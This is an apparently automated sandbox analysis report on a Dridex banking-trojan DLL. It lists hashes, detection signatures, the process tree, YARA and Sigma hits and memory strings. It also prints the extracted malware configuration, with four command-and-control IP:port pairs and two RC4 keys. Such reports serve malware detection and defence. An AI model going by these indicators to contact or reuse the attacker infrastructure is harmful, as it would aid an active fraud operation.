Play interactive tour

Edit tour

Windows Analysis Report SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll

Overview

General Information

Sample Name:	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll
Analysis ID:	544197
MD5:	5c9f3e803604beb0fd134699e214db4c
SHA1:	3e775ec10dce6ce1bfc8c7aa299eef7e762c5fcc
SHA256:	a7efe0ee7f8d77a65b1fff3ba0cee76acb43223365dc348fa43ceecf93bcf7f0
Tags:	dllDridex
Infos:
Most interesting Screenshot:

Detection

Dridex

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Dridex unpacked file

Multi AV Scanner detection for submitted file

Sigma detected: Suspicious Call by Ordinal

Tries to delay execution (extensive OutputDebugStringW loop)

C2 URLs / IPs found in malware configuration

Creates a DirectInput object (often for capturing keystrokes)

Uses 32bit PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

One or more processes crash

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Checks if the current process is being debugged

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Entry point lies outside standard sections

Abnormal high CPU Usage

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 5212 cmdline: loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)

cmd.exe (PID: 6932 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 484 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 6720 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 484 -s 684 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 22201, "C2 list": ["144.91.122.102:443", "85.10.248.28:593", "185.4.135.27:5228", "80.211.3.13:8116"], "RC4 keys": ["3IC8sFlUX9XZuoBQY9u5LhcZnHsV7E5r", "hnk63OiMfIbUqQnY7gkPwplwC0Ue5ZkZBYMCTYTjntqX7zsy9OvtNUlthJZXRtFF6P52Zbz6R5"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000002.00000000.668687209.000000006E701000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000000.00000002.1058145995.000000006E701000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000002.00000000.666259789.000000006E701000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000002.00000002.700452681.000000006E701000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Unpacked PEs

Source	Rule	Description	Author
2.0.rundll32.exe.6e700000.5.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
2.0.rundll32.exe.6e700000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0.2.loaddll32.exe.6e700000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
2.2.rundll32.exe.6e700000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal

Show sources

Source: Process started

Author: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6932, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll",#1, ProcessId: 484

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 2.0.rundll32.exe.6e700000.2.unpack

Malware Configuration Extractor: Dridex {"Version": 22201, "C2 list": ["144.91.122.102:443", "85.10.248.28:593", "185.4.135.27:5228", "80.211.3.13:8116"], "RC4 keys": ["3IC8sFlUX9XZuoBQY9u5LhcZnHsV7E5r", "hnk63OiMfIbUqQnY7gkPwplwC0Ue5ZkZBYMCTYTjntqX7zsy9OvtNUlthJZXRtFF6P52Zbz6R5"]}

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Virustotal: Detection: 18%			Perma Link
Source: SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	ReversingLabs: Detection: 25%

Source: SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: powrprof.pdbE source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000005.00000003.677574023.00000000052D1000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.672747235.000000000500F000.00000004.00000001.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000005.00000003.677574023.00000000052D1000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000005.00000003.677574023.00000000052D1000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000005.00000003.677596575.0000000005480000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: loaddll32.exe, 00000000.00000003.673149439.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.677574023.00000000052D1000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdbC source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000005.00000003.677596575.0000000005480000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdby source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: combase.pdbQ source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000005.00000003.677574023.00000000052D1000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdbk source: WerFault.exe, 00000005.00000003.677574023.00000000052D1000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000005.00000003.677596575.0000000005480000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdba source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000005.00000003.677574023.00000000052D1000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000005.00000003.677574023.00000000052D1000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000005.00000003.677596575.0000000005480000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000005.00000003.677574023.00000000052D1000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb; source: WerFault.exe, 00000005.00000003.677596575.0000000005480000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: RFFGTEQ.pdb source: SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000005.00000003.677596575.0000000005480000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdbp source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000005.00000003.677574023.00000000052D1000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 00000005.00000003.677596575.0000000005480000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb8 source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdbm source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.673149439.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000005.00000003.677596575.0000000005480000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000005.00000003.677574023.00000000052D1000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000005.00000003.677596575.0000000005480000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000005.00000003.677596575.0000000005480000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000005.00000003.677596575.0000000005480000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000005.00000003.677596575.0000000005480000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000005.00000003.677574023.00000000052D1000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000005.00000003.677574023.00000000052D1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000005.00000003.677574023.00000000052D1000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdbO source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdbw source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdbk source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 144.91.122.102:443
Source: Malware configuration extractor	IPs: 85.10.248.28:593
Source: Malware configuration extractor	IPs: 185.4.135.27:5228
Source: Malware configuration extractor	IPs: 80.211.3.13:8116

Source: Joe Sandbox View	ASN Name: TOPHOSTGR TOPHOSTGR
Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: Joe Sandbox View	IP Address: 185.4.135.27 185.4.135.27
Source: Joe Sandbox View	IP Address: 85.10.248.28 85.10.248.28

Source: WerFault.exe, 00000005.00000002.698763311.0000000004F7F000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.690108064.0000000004F7F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: loaddll32.exe, 00000000.00000002.1058180186.000000006E71F000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.666345580.000000006E71F000.00000002.00020000.sdmp	String found in binary or memory: http://www.n4pkg6fy8o.gaDVarFileInfo$

Source: loaddll32.exe, 00000000.00000002.1057800999.0000000000A8B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 2.0.rundll32.exe.6e700000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.rundll32.exe.6e700000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6e700000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.6e700000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.668687209.000000006E701000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1058145995.000000006E701000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.666259789.000000006E701000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.700452681.000000006E701000.00000020.00020000.sdmp, type: MEMORY

System Summary:

Source: SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll

Binary or memory string: OriginalFilenameIha.dllD vs SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 484 -s 684

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E710730	0_2_6E710730
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E719370	0_2_6E719370
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E71143C	0_2_6E71143C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E708428	0_2_6E708428
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E70A4E8	0_2_6E70A4E8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E701494	0_2_6E701494

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E712234 NtDelayExecution,		0_2_6E712234
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E712820 NtAllocateVirtualMemory,		0_2_6E712820

Source: C:\Windows\System32\loaddll32.exe

Process Stats: CPU usage > 98%

Source: SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Virustotal: Detection: 18%
Source: SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	ReversingLabs: Detection: 25%

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll",#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 484 -s 684
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll",#1	Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess484

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB57.tmp

Jump to behavior

Source: classification engine

Classification label: mal76.troj.evad.winDLL@6/6@0/4

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: powrprof.pdbE source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000005.00000003.677574023.00000000052D1000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.672747235.000000000500F000.00000004.00000001.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000005.00000003.677574023.00000000052D1000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000005.00000003.677574023.00000000052D1000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000005.00000003.677596575.0000000005480000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: loaddll32.exe, 00000000.00000003.673149439.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.677574023.00000000052D1000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdbC source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000005.00000003.677596575.0000000005480000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdby source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: combase.pdbQ source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000005.00000003.677574023.00000000052D1000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdbk source: WerFault.exe, 00000005.00000003.677574023.00000000052D1000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000005.00000003.677596575.0000000005480000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdba source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000005.00000003.677574023.00000000052D1000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000005.00000003.677574023.00000000052D1000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000005.00000003.677596575.0000000005480000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000005.00000003.677574023.00000000052D1000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb; source: WerFault.exe, 00000005.00000003.677596575.0000000005480000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: RFFGTEQ.pdb source: SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000005.00000003.677596575.0000000005480000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdbp source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000005.00000003.677574023.00000000052D1000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 00000005.00000003.677596575.0000000005480000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb8 source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdbm source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.673149439.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000005.00000003.677596575.0000000005480000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000005.00000003.677574023.00000000052D1000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000005.00000003.677596575.0000000005480000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000005.00000003.677596575.0000000005480000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000005.00000003.677596575.0000000005480000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000005.00000003.677596575.0000000005480000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000005.00000003.677574023.00000000052D1000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000005.00000003.677574023.00000000052D1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000005.00000003.677574023.00000000052D1000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdbO source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdbw source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdbk source: WerFault.exe, 00000005.00000003.677665252.0000000005486000.00000004.00000040.sdmp

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E70F6A8 push esi; mov dword ptr [esp], 00000000h

0_2_6E70F6A9

Source: initial sample

Static PE information: section where entry point is pointing to: .rdata

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
